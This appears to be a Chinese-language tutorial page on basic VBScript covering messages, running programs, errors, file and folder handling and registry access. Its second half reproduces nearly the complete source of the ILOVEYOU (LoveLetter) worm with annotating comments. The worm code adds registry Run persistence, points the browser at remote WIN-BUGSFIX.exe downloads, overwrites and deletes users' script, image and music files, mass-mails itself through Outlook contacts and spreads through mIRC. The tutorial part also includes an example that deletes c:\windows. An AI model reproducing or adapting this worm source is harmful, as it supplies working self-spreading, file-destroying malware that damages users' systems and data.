千家信息网

最基础的vbscript,jscript脚本编程方法

发表于:2025-11-17 作者:千家信息网编辑
千家信息网最后更新 2025年11月17日,这篇文章主要介绍"最基础的vbscript,jscript脚本编程方法",在日常操作中,相信很多人在最基础的vbscript,jscript脚本编程方法问题上存在疑惑,小编查阅了各式资料,整理出简单好
千家信息网最后更新 2025年11月17日最基础的vbscript,jscript脚本编程方法

这篇文章主要介绍"最基础的vbscript,jscript脚本编程方法",在日常操作中,相信很多人在最基础的vbscript,jscript脚本编程方法问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答"最基础的vbscript,jscript脚本编程方法"的疑惑有所帮助!接下来,请跟着小编一起来学习吧!

1、我们的第一个vbs程序:还是那个老得掉牙的冬冬。

************************hello.vbs**************************

dim hello

hello="hello world!"

wscript.echo hello

wscript echo " this is my first vbs"

可以看出wscript.echo有两种用法,这个不难。

可以直接双击运行,可以在当前目录的命令行输入:

cscript hello.vbs


2、在脚本中调用其他的程序:

使用run()方法,在使用前必须先建立shell的实例

********************shell.vbs******************************************

set ws=wscript.createobject("wscript.shell")

ret=ws.run ("notepad" ,3,true)

if ret=0 then

wscript.echo "succeed!"

else

wscript.echo "there is a error,the error number is:"

wscript.echo cstr(ret)

end if

***************************************************************************

这里run 有三个参数,第一个参数是你要执行的程序的路径

第二个程序是窗口的形式,0是在后台运行;

1表示正常运行

2表示激活程序并且显示为最小化

3表示激活程序并且显示为最大化

一共有10个这样的参数我只列出了4个最常用的。

第三个参数是表示这个脚本是等待还是继续执行,如果设为了true,脚本就会等待调用的程序退出后再向后执行。

注意到没有,我在run的前面还有一个接受返回值的变量,一般来说如果返回为0,表示成功执行,如果不为0,则这个返回值就是错误代码,可以通过这个代码找出相应的错误。


3、inputbox 和msgbox

会vb的人对着两个东西应该很熟悉,用法也没什么差别

input=inputbox("please enter you password","passwd")

if input<>"1234"

then

msgbox "you enter a wrong passwd"

end if

当然你也可以给msgbox添加按钮,用一个变量接受用户的选择

例如:ret=msgbox "continue?",vbyesnocancel

返回值和常量对照如下:

vbok 1

vbcancel 2

vbabort 3

vbretry 4

vbignore 5

vbyes 6

vbno 7


4、错误处理

何vb一样用on error resume next

这个没什么好说的,如果遇到了错误就跳过继续执行下一句

当然这个方法很弱智,还需要有一个方法,vbscript提供了一个对象err对象

他有两个方法clear,raise

5个属性:description,helpcontext ,helpfile,number,source

我们可以利用err.number获得错误号例如

***********************err.vbs*****************************

on error resume next

a=11

b=0

c=a/b

if err.number<>0 then

wscript.echo err.number & err.description & err.source

end if

我们可以用err.raisel来手工抛出错误

比如我们要产生一个path not found的错误 告诉用户,他填写的路径不对

on error resume next

err.raise 76

msgbox "error :" & err.description

err.clear


vbscript脚本编程教程2

by sssa2000

7/7/2004

我们来看一看怎么利用fso来进行文件操作。Fso时vbs里进行文件操作的核心。作为黑客,不管学习什么语言,对文件的操作都应该是要了如指掌的,所以请大家仔细学习。

不说废话,先看fso由哪几个对象组成:


drive对象:包含储存设备的信息,包括硬盘,光驱,ram盘,网络驱动器

drives集合:提供一个物理和逻辑驱动器的列表

file 对象:检查和处理文件

files 集合:提供一个文件夹中的文件列表

folder对象:检查和处理文件夹

folders集合:提供文件夹中子文件夹的列表

textstream对象:读写文本文件


看看fso的方法:由于很多,所以我不会把每个的作用写出来,如果有不懂的,自己查一下msdn。不要说没有哦

bulidpath:把文件路径信息添加到现有的文件路径上

copyfile

copyfolder

createfolder

createtextfile

deletefile

deletefolder

dreveexits

fileexits

folderexists

getabsolutepathname:返回一个文件夹或文件的绝对路径

getbasename:返回一个文件或文件夹的基本路径

getdrive:返回一个dreve对象

getdrivename:返回一个驱动器的名字

getextensionname:返回扩展名

getfile:返回一个file对象

getfilename:返回文件夹中文件名称

getfolder

getparentfoldername:返回一个文件夹的父文件夹

getspecialfolder:返回指向一个特殊文件夹的对象指针

gettempname:返回一个可以被createtextfile使用的随机产生的文件或文件夹的名称

movefile

movefolder

opentextfile


1、使用fso

由于fso不是wsh的一部分,所以我们需要建立他的模型

例如set fs=wscript.createobject("scripting.filesystemobject")

这样就建立了fso的模型。如果要释放的话也很简单,set fs=nothing



2、使用文件夹

创建:

在创建前我们需要检查是否存在,看一下程序

***************************createfolder.vbs*****************************

dim fs,s

set fs=wscript.createobject("scripting.filesystemobject")

if (fs.folderexists("c:\temp")) then

s="is available"

else

s="not exist"

set foldr=fs.createfolder("c:\temp")

end if

删除、拷贝、移动


删除:

set fs=wscript.createobject("scripting.filesystemobject")

fs.deletefolder("c:\windows")


拷贝:

set fs=wscript.createobject("scripting.filesystemobject")

fs.copyfolder "c:\data" "d:\data"

注意,如果这个时候c:\data 和d:\data都存在,会出错,复制也就会停止,如果要强制覆盖,使用fs.copyfolder "c:\data" "d:\data",true


移动

set fs=wscript.createobject("scripting.filesystemobject")

fs.movefolder "c:\data" "d:\data"


关于通配符:

我们可以使用统配符,来方便操作:

例如, fs.movefolder :c:\data\te*" , "d:\working"

注意到没有,我在目的路径最后没有使用"\" 也就是说我没有这样写:

fs.movefolder :c:\data\te*" , "d:\working\"

这样写的话,如果d:\working 目录不存在,windows就不会为我们自动创建这个目录。


还有一点,大家注意到没有 上面说的都没有涉及到folder对象,我们都是在利用fso提供的方法,当然利用folder一样可以的:

set fs= wscript.createobject("scripting.filesystemobject")

set f=fs.getfolder("c:\data")

f.delete '删除。如果有子目录,也会被删除

f.copy "d:\working",true '拷贝到d:\working

f.move :"d:\temp" '移动到d:\temp


特殊文件夹

一般指的就是系统文件夹:\windows\system32, 临时文件夹,windows文件夹

看下面,我们使用环境变量来获得windows目录,关于环境变量我们会在后面详细讲道,如果我忘记了 请大家提醒我

set fs=wscript.createobject("scripting.filesystemobject")

set wshshell=wscript.createobject("wscript.shell")

osdir=wshshell.expandenvironmentstrings("%systemroot%")

set f =fs.getfolder(osdir)

wscript.echo f


当然,还有简单的方法 那就是使用getspecialfolder()

这个方法使用3种值:

0 表示windows文件夹,相关常量是windowsfolder

1 系统文件夹,相关常量是systemfolder

2 临时目录,相关常量temporaryfolder

看下面的例子:

***********************************getspecialfolder***************************

set fs=wscript.createobject("scripting.filesystemobject")

set wfolder=fs.getspecialfolder(0) '返回windows目录

set wfolder=fs.getspecialfolder(1) '返回system32\

set wfolder=fs.getspecialfolder(2)'返回临时目录


3、使用文件

使用文件属性:

文件夹的属性我没有说,大家可以从文件属性里举一反三

文件属性常用的就是:

normal 0

readonly 1

hideen 2

system 4


set fs=wscript.createobject("scripting.filesystemobject")

set f=fs.gerfile("d:\index.txt")

f.attributes=f.attributes+1


这里由于不知道d:\index.txt的文件属性,所以会发生不可预测的结果,如果文件的属性是0,那么就会变成1。所以最好在改变属性前查询


创建

创建前需要检查文件是否存在,方法和前面说的文件夹的方法一样

*****************************file.vbs**********************************

set fs=wscript.createobject("scripting.filesystemobject")

if fs.fileexists("c:\asd.txt") then

s=" available"

else

s=not exist"

set f=fs.createtextfile("c:\asd.txt")

end if

当然 我们也可以使用set f=fs.createtextfile("c:\asd.txt",true)

来强制覆盖已存在的文件。



复制移动删除文件

和文件夹一样 我们既可以使用fso提供的方法也可以用file对象

set fs=wscript.createobject("scripting.filesystemobject")

fs.copyfile "c:\asd.txt","d:\1\asd.txt",true '复制文件,如果已存在就强制覆盖

fs.movefile "c:\asd.txt", "d:\" '移动

fs.deletefile "c:\asd.txt" '删除


Vbscript 脚本编程3 关于文件的读写


By sssa2000

7/9/2004


使用vbscript来读写文件,十分的方便,废话少说,切入正题。


1、打开文件

使用opentextfile方法

set fs =createobject("scripting.filesystemobject")

set ts=fs.opentextfile("c:\1.txt",1,true)

注意这里需要填入文件的完整路径,后面一个参数为访问模式

1为forreading

2为forwriting

8为appending

第三个参数指定如果指定文件不存在,是否创建。

2、读取文件

读取文件的方法有三个

read(x)读取x个字符

readline读取一行

readall全部读取

例如:

set fs =createobject("scripting.filesystemobject")

set ts=fs.opentextfile("c:\1.txt",1,true)

value=ts.read(20)

line=ts.readline

contents=ts.readall


这里还要介绍几个指针变量:

textstream对象的atendofstream属性。当处于文件结尾的时候这个属性返回true.我们可以用循环检测又没有到达文件末尾。例如:

set fs =createobject("scripting.filesystemobject")

set f=fs.getfile("c:\1.txt",1,false)

set ts=f.openastextstream(1,0)

do while ts.atendofstream<>true

f.read(1)

loop


还有一个属性,atendofline,如果已经到了行末尾,这个属性返回true.

Textstream对象还有两个有用的属性,column和line.

在打开一个文件后,行和列指针都被设置为1。

看一个综合的例子吧:

*******************************read.vbs******************************

set fs =createobject("scripting.filesystemobject")

set f=fs.opentextfile("c:\1.txt",1,true)

do while f.atendofstream<>true

data=""

for a=1 to 5

if f.atendofstream<>true then

data=data+f.readline

end if

next

dataset=dataset+1

wscript.echo "data set" &dataset & ":" & data

loop



最后说一下在文件中跳行

skip(x) 跳过x个字符

skipline 跳过一行

用法也很简单 和前面一样,就不说了。


3、写文件

可以用forwriting和forappending方式来写

写有3各方法:

write(x)

writeline

writeblanklines(n) 写入n个空行


来看一个例子:

*****************************************************************

data="hello, I like script programing"

set fs =createobject("scripting.filesystemobject")

if (fs.fileexists("c:\2.txt")) then

set f =fs.opentextfile("c:\2.txt",8)

f.write data

f.writeline data

f.close

else

set f=fs.opentextfile("c:\2.txt",2, true)

f.writeblanklines 2

f.write data

f.close

end if

注意 写完文件以后一定要关闭!!!!!!! 还有就是,如果要读文件又要写文件,读完之后一定也要记得关闭,这样才能以写的方式打开。


Vbscript编程5

注册表,修改注册表是编程的一个基本技能,脚本编程当然也不例外。

这里,我就不再讲解注册表的基本结构。


1、读注册表的关键词和值:

可以通过把关键词的完整路径传递给wshshell对象的regread方法

例如:

set ws=wscript.createobject("wscript.shell")

v=ws.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\nwiz")

wscript.echo v


2、写注册表

有读就有写了,使用wshshell对象的regwrite方法

看例子:

path="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"

set ws=wscript.createobject("wscript.shell")

t=ws.regwrite(path & "jj","hello")


这样就把

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\jj这个键值改成了hello.不过要注意:这个键值一定要预先存在。


如果要创建一个新的关键词,同样也是用这个方法。

path="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\run\sssa2000\love\"

set ws=wscript.createobject("wscript.shell")

val=ws.regwrite(path,"nenboy")

val=ws.regread(path)

wscript.echo val


删除关键字和值

使用regdelete方法,把完整的路径传递给regdelete就可以了

例如

val=ws.regdel(path)

注意,如果要删除关键词的值的话 一定要在路径最后加上"\",如果不加斜线,就会删除整个关键词。


rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philip
pines
' 注释:程序作者的签名(可能)

On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
' 注释:FileSystemObject是M$ VBVM系统中最危险的部分,它的功能十分强大

' 从病毒使用FSO可以知道,通过修改注册表,可以轻易防止 Love Letter发作。


set file = fso.OpenTextFile(WScript.ScriptFullname,1) '返回当前脚本的完整路径
vbscopy=file.ReadAll
main()
' 注释 - 程序初始化完成。

sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scriptin
g Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
' 注释 - 防止操作超时造成的程序终止。
' 应该说,编写病毒的程序员考虑到了可能发生的问题,这一点值得所有的编程
者借鉴。
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
' 获取系统关键文件夹的名称
' VB编程时可以用。

Set c = fso.GetFile(WScript.ScriptFullName) '返回当前脚本的完整路径
c.Copy(dirsystem&"\MSKernel32.vbs") 'Copies a specified file or folder from one location to another.
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
' 复制自身到关键目录中备用。
' 文件名并不是很好。太容易被发现了。

regruns()
html()
spreadtoemail()
listadriv()
end sub


sub regruns()
' 修改注册表,以便自动装载病毒程序
' 预防:经常检查注册表中的这一分支。
' 已知的方法还有把HTA放入Startup文件夹。病毒程序使用的方法更先进,
' 因为它不会因为语言问题而失效。
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
n\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
n\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explore
r\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",
"http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",
"http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",
"http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",
"http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-B
UGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
n\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
\Start Page","about:blank"
end if
end sub

sub folderlist(folderspec)
' 遍历文件夹
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders '得到某一特定文件夹的所有子文件夹,包括系统隐藏文件夹
for each f1 in sf 'f1为每一个子文件夹的对象
infectfiles(f1.path) '传染文件的操作
folderlist(f1.path) '再次进行文件夹遍历
next
end sub


sub listadriv
' 遍历所有驱动器。
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then '2.3分别为硬盘和网络共享盘
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub

function fileexist(filespec)
' 判断文件是否存在
' 纯粹从技术角度讲,这段程序写的不怎么样。
' 不用写这么长就能够实现相同的功能
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function


function folderexist(folderspec)
' 判断文件夹是否存在
' 和上一段程序一样臭。
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function

 


sub infectfiles(folderspec)
' 执行传染文件的操作。
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files '得到某一特定文件夹的所有文件,包括系统隐藏文件
for each f1 in fc
ext=fso.GetExtensionName(f1.path) '得到扩展名
ext=lcase(ext) '转变为小写
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy 'vbscopy=file.ReadAll
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext=
"sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="scri
pt.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corru
pt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
' 病毒作者的英文恐怕没学好……不过,这样吓唬人也够损的了。
' 这里提醒各位注意,不要在乎那些吓人的文字,仔细观察就会发现漏洞其实不
少。
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FO
R-YOU.HTM"
scriptini.WriteLine "n3=}"
' 注意,这样做的结果是,MIRC也能够传染病毒。
scriptini.close
eq=folderspec
end if
end if
next
end sub


sub regcreate(regkey,regvalue)
' 修改注册表(创建键值)
' 这个程序似乎是微软的示范程序。
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub


function regget(value)
' 这个程序似乎也是微软的示范程序。(WSH示范,在Windows文件夹)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function


sub spreadtoemail()
' 通过电子邮件扩散
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
' 病毒的局限:只支持Outlook,而Outlook Express则不支持。
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&male
ad)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
' 病毒得名的原因
' 见到这样的邮件,肯定是病毒。
' 头脑正常的人恐怕不会这样直白的。
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from m
e."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,
"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Addre
ssEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Addre
ssEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
' 从技术角度说,这段程序写得很漂亮,原因在于充分地利用了 Outlook 的资源
' 值得编写程序的借鉴。
' 程序中间的_符号是连接线,所以注释写在这里。
' 程序中无效语句很多,浪费了不少空间。
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="LOVELETTER - HTML<?-?TITLE><META NAME=@-@Gene<br>rator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _<br>"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @G<br>RAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _<br><br>"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is go<br>od...@-@>"&vbcrlf& _<br>"<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LO<br>VE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _<br>"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YO<br>U.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@<br>>"&vbcrlf& _<br>"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to r<br>ead this HTML file<BR>- Please press #-#YES#-# button to Enable Active<br>X<?-?p>"&vbcrlf& _<br>"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>--------<br>--z--------------------z----------<?-?MARQUEE> "&vbcrlf& _<br>"<?-?BODY><?-?HTML>"&vbcrlf& _<br>"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _<br>"<!--?-??-?"&vbcrlf& _<br>"if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight<br>;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _<br>"?-??-?-->"&vbcrlf& _<br>"<?-?SCRIPT>"&vbcrlf& _<br>"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _<br>"<!--"&vbcrlf& _<br>"on error resume next"&vbcrlf& _<br>"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _<br>"aw=1"&vbcrlf& _<br>"code="<br>dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf&<br>_<br>"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _<br>"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _<br>"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _<br>"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _<br>"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf<br>& _<br>"wri.write code4"&vbcrlf& _<br>"wri.close"&vbcrlf& _<br>"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf&<br>_<br>"if (err.number=424) then"&vbcrlf& _<br>"aw=0"&vbcrlf& _<br>"end if"&vbcrlf& _<br>"if (aw=1) then"&vbcrlf& _<br>"[xss_clean] @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _<br>"window.close"&vbcrlf& _<br>"end if"&vbcrlf& _<br>"end if"&vbcrlf& _<br>"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _<br>"regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windo<br>ws^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.v<br>bs@-@"&vbcrlf& _<br>"?-??-?-->"&vbcrlf& _<br>"<?-?SCRIPT>"<br>dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")<br>dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")<br>dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")<br>dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")<br>dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")<br>dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")<br>dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")<br>dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")<br>set fso=CreateObject("Scripting.FileSystemObject")<br>set c=fso.OpenTextFile(WScript.ScriptFullName,1)<br>lines=Split(c.ReadAll,vbcrlf)<br>l1=ubound(lines)<br>for n=0 to ubound(lines)<br>lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))<br>lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))<br>lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))<br>if (l1=n) then<br>lines(n)=chr(34)+lines(n)+chr(34)<br>else<br>lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"<br>end if<br>next<br>set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")<br>b.close<br>set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)<br>d.write dt5<br>d.write join(lines,vbcrlf)<br>d.write vbcrlf<br>d.write dt6<br>d.close<br>end sub<br></p><p class="introduction">到此,关于"最基础的vbscript,jscript脚本编程方法"的学习就结束了,希望能够解决大家的疑惑。理论与实践的搭配能更好的帮助大家学习,快去试试吧!若想继续学习更多相关知识,请继续关注网站,小编会继续努力为大家带来更多实用的文章!</p> </div> <div class="diggit"><a href="#"> 很赞哦! </a></div> <div class="clear"></div> <div class="keywords"> <a href="/s-文件">文件</a> <a href="/s-文件夹">文件夹</a> <a href="/s-方法">方法</a> <a href="/s-程序">程序</a> <a href="/s-对象">对象</a> <a href="/s-属性">属性</a> <a href="/s-路径">路径</a> <a href="/s-脚本">脚本</a> <a href="/s-编程">编程</a> <a href="/s-注册表">注册表</a> <a href="/s-病毒">病毒</a> <a href="/s-关键">关键</a> <a href="/s-目录">目录</a> <a href="/s-脚本编程">脚本编程</a> <a href="/s-错误">错误</a> <a href="/s-参数">参数</a> <a href="/s-系统">系统</a> <a href="/s-学习">学习</a> <a href="/s-关键词">关键词</a> <a href="/s-变量">变量</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377745.html">数据库的安全要保护哪些东西</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2375887.html">数据库安全各自的含义是什么</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377880.html">生产安全数据库录入</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377879.html">数据库的安全性及管理</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377878.html">数据库安全策略包含哪些</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377877.html">海淀数据库安全审计系统</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377876.html">建立农村房屋安全信息数据库</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377875.html">易用的数据库客户端支持安全管理</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377874.html">连接数据库失败ssl安全错误</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2377873.html">数据库的锁怎样保障安全</a> <a target="_blank" href="https://www.qianjiagd.com/tag-908829.html">数据库登录窗口的实现原理</a> <a target="_blank" href="https://www.qianjiagd.com/tag-1786140.html">cis网络安全创新大会</a> <a target="_blank" href="https://www.qianjiagd.com/tag-1040772.html">腾讯ec数据库导出数据</a> <a target="_blank" href="https://www.qianjiagd.com/tag-169595.html">java获取服务器地址</a> <a target="_blank" href="https://www.qianjiagd.com/tag-378449.html">王者服务器未响应进不去怎么回事</a> <a target="_blank" href="https://www.qianjiagd.com/tag-1637839.html">清华大学网络安全书单</a> <a target="_blank" href="https://www.qianjiagd.com/tag-274568.html">绝地求生服务器故障</a> <a target="_blank" href="https://www.qianjiagd.com/tag-375630.html">发送邮件无法连接到发件服务器</a> <a target="_blank" href="https://www.qianjiagd.com/tag-1845424.html">网络安全员证怎么写</a> <a target="_blank" href="https://www.qianjiagd.com/tag-1038984.html">数据库字段属性怎么填</a> <a target="_blank" href="https://www.qianjiagd.com/tag-467214.html">小特app显示服务器出错</a> <a target="_blank" href="https://www.qianjiagd.com/tag-1683118.html">机场网络安全上市</a> <a target="_blank" href="https://www.qianjiagd.com/tag-694418.html">aspnet数据库怎么显示内容</a> <a target="_blank" href="https://www.qianjiagd.com/tag-2153146.html">软件开发平台是什么语言</a> <a target="_blank" href="https://www.qianjiagd.com/tag-1686878.html">我国网络安全专业人才匮乏</a> <a target="_blank" href="https://www.qianjiagd.com/tag-1996030.html">河西金蝶软件开发价格</a> <a target="_blank" href="https://www.qianjiagd.com/tag-14666.html">丽江互联网科技怎么选</a> <a target="_blank" href="https://www.qianjiagd.com/tag-1014850.html">帆软连接远程数据库</a> <a target="_blank" href="https://www.qianjiagd.com/tag-1427387.html">三种安全容器网络安全</a> <a target="_blank" href="https://www.qianjiagd.com/tag-1863527.html">什么是网络安全隐患分析的核心</a> <a target="_blank" href="https://www.qianjiagd.com/s-安微网新网络技术">安微网新网络技术</a> <a target="_blank" href="https://www.qianjiagd.com/s-巨杉数据库萧少聪">巨杉数据库萧少聪</a> <a target="_blank" href="https://www.qianjiagd.com/s-用友u8数据库怎么用">用友u8数据库怎么用</a> <a target="_blank" href="https://www.qianjiagd.com/s-独立服务器管理">独立服务器管理</a> <a target="_blank" href="https://www.qianjiagd.com/s-网络安全模型图包括">网络安全模型图包括</a> <a target="_blank" href="https://www.qianjiagd.com/s-嵌入式 音视频 网络技术">嵌入式 音视频 网络技术</a> <a target="_blank" href="https://www.qianjiagd.com/s-软件开发财务做账流程">软件开发财务做账流程</a> <a target="_blank" 